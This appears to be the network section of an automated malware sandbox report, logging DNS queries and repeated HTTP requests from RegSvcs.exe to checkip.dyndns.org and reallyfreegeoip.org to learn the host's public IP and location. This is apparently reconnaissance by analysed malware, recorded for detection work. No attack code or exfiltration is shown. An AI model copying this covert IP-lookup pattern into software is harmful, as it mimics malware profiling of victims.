Nov 25, 2024 08:49:35.631007910 CET	80	49762	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:35.631102085 CET	49762	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:35.631823063 CET	80	49764	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:35.631901979 CET	49764	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:35.632019997 CET	49764	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:35.751539946 CET	80	49764	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:36.944889069 CET	80	49764	193.122.6.168	192.168.2.4
Nov 25, 2024 08:49:36.946147919 CET	49765	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:36.946197033 CET	443	49765	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:36.946301937 CET	49765	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:36.946552992 CET	49765	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:36.946571112 CET	443	49765	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:36.991642952 CET	49764	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:49:38.210974932 CET	443	49765	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:38.212528944 CET	49765	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:38.212549925 CET	443	49765	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:38.665697098 CET	443	49765	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:38.665854931 CET	443	49765	172.67.177.134	192.168.2.4
Nov 25, 2024 08:49:38.665908098 CET	49765	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:49:38.666229010 CET	49765	443	192.168.2.4	172.67.177.134
Nov 25, 2024 08:50:16.636243105 CET	80	49735	193.122.6.168	192.168.2.4
Nov 25, 2024 08:50:16.636691093 CET	49735	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:50:29.168015957 CET	80	49754	193.122.6.168	192.168.2.4
Nov 25, 2024 08:50:29.168287992 CET	49754	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:50:29.335087061 CET	80	49755	193.122.6.168	192.168.2.4
Nov 25, 2024 08:50:29.335191011 CET	49755	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:50:41.944839954 CET	80	49764	193.122.6.168	192.168.2.4
Nov 25, 2024 08:50:41.946882010 CET	49764	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:51:04.351651907 CET	49755	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:51:04.471153975 CET	80	49755	193.122.6.168	192.168.2.4
Nov 25, 2024 08:51:16.960746050 CET	49764	80	192.168.2.4	193.122.6.168
Nov 25, 2024 08:51:17.080575943 CET	80	49764	193.122.6.168	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 08:49:00.710141897 CET	64484	53	192.168.2.4	1.1.1.1
Nov 25, 2024 08:49:00.848140955 CET	53	64484	1.1.1.1	192.168.2.4
Nov 25, 2024 08:49:02.765568972 CET	55616	53	192.168.2.4	1.1.1.1
Nov 25, 2024 08:49:03.221362114 CET	53	55616	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 08:49:00.710141897 CET	192.168.2.4	1.1.1.1	0xac1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 25, 2024 08:49:02.765568972 CET	192.168.2.4	1.1.1.1	0x5f6b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 08:49:00.848140955 CET	1.1.1.1	192.168.2.4	0xac1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 08:49:00.848140955 CET	1.1.1.1	192.168.2.4	0xac1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 25, 2024 08:49:00.848140955 CET	1.1.1.1	192.168.2.4	0xac1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 25, 2024 08:49:00.848140955 CET	1.1.1.1	192.168.2.4	0xac1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 25, 2024 08:49:00.848140955 CET	1.1.1.1	192.168.2.4	0xac1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 25, 2024 08:49:00.848140955 CET	1.1.1.1	192.168.2.4	0xac1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 25, 2024 08:49:03.221362114 CET	1.1.1.1	192.168.2.4	0x5f6b	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Nov 25, 2024 08:49:03.221362114 CET	1.1.1.1	192.168.2.4	0x5f6b	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	193.122.6.168	80	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:00.979166985 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 08:49:02.309218884 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:02 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f81e994ea5c7a790c01c2a3ce6032c8d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 08:49:02.313585997 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 08:49:02.727622032 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:02 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f9d542d924c1611919211b4a9744c6d5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 08:49:04.957895041 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 08:49:05.373205900 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:05 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 64f2f0aa55747c60f70837ea360ef5cf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	193.122.6.168	80	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:07.164113998 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 08:49:08.477302074 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9c8d124bdea312681059e2c282fc4ff5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	193.122.6.168	80	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:10.323153973 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 08:49:11.635962963 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2be8813719b0f79e39484bfa74a8aaf3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	193.122.6.168	80	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:13.363337040 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 08:49:14.675910950 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0859ff941b5dd3f5c28d1ac54482cae6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 08:49:14.679570913 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 08:49:15.093767881 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f8e67d6f4e320377e9606a43ac8a52dd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 08:49:17.331980944 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 08:49:17.746926069 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3046fdd9c7782c2267a5ec8b1ebe36ca Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49738	193.122.6.168	80	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:13.481395960 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 08:49:14.798762083 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 73e5094e76666dbee24cc1fc5fb674cc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	193.122.6.168	80	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:16.635565996 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 08:49:18.004749060 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f25807f1e2d9911764cb7c27584695d4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	193.122.6.168	80	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:19.548170090 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 08:49:20.907203913 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 46bfbd1fc1ffe76b0f9ece4c8c979106 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	193.122.6.168	80	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:19.903403044 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 08:49:21.217550993 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 97e03bb006b553b058978f1a5d266856 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49754	193.122.6.168	80	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:22.809207916 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 08:49:24.168174982 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a19a6fd3da10f7e4b5687823ee12c4d6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49755	193.122.6.168	80	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:23.068350077 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 08:49:24.334388018 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e57abcd14a03f519b1dd29e72470a7fc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49758	193.122.6.168	80	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:26.014661074 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 08:49:27.327369928 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bfeff5522fb780eff69113e8725335da Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49760	193.122.6.168	80	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:29.358017921 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 08:49:30.670620918 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 46f5d73e61c23399ed6b77f7ddcf974b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49762	193.122.6.168	80	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:32.514848948 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 08:49:33.780957937 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:33 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0e1d2d6a103d2a93ffa403a1da215471 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49764	193.122.6.168	80	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 08:49:35.632019997 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 08:49:36.944889069 CET	320	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 07:49:36 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a9f3f3a2b6c127062a8d3b458e9e9aef Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	172.67.177.134	443	7488	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 07:49:04 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
